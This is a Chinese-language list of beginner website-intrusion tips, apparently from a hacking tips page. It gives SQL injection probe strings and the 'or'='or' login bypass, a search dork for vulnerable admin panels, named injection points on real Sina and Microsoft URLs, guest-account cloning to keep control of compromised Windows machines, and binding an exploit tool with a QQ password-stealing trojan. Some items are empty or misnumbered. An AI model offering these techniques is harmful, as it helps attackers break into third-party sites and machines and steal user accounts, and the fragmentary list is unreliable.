常研究网站入侵,
大多现在比较少了。但有些仍管用。适合新手,老鸟略过。。
有些也可回味下。。
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络
2.搜索栏里输入
关键字%’and 1=1 and ’%’=’
关键字%’and 1=2 and ’%’=’
比较不同处 可以作为注入的特征字符
3.登陆框用户名和密码输入’or’=’or’ 漏洞很老但是现在很是遍地都是
4.我们先到www.google.com底下搜索一下co net mib ver 1.0
密码帐号都是 ’or’=’or’
5.挂马代码
6.http://www.wyyfk.com/24小时挂QQ工具 (这个暂时不能用了)
7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,
net localgroup administrators还是可以看出guest是管理员来
7.只要敢想,新浪也可入侵 注入点
http://igame.sina.com.cn/plaza/event/new/crnt_event_vIEw.asp?event_id=59
微软 注入点
http://www.microsoft.com/library/toolbar/3.0/search.aspx?vIEw=en-us&charset=iso-8859-1&qu=
(这是新浪的ASP程序)
8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上QQ大盗木马
9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器
sql注入后,如何上传木马,
文章地址http://hack123.home4u.china.com/0601.htm
10.QQ强制聊天代码
qq.com/msgrd?v=1&uin=" target=_blank>http://wpa.QQ.com/msgrd?v=1&uin=对方的QQ号&site=ioshenmue&menu=yes
使用方法:把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可,
入侵网站的方法大集合(适合新手)https://www.unjs.com消息 下一页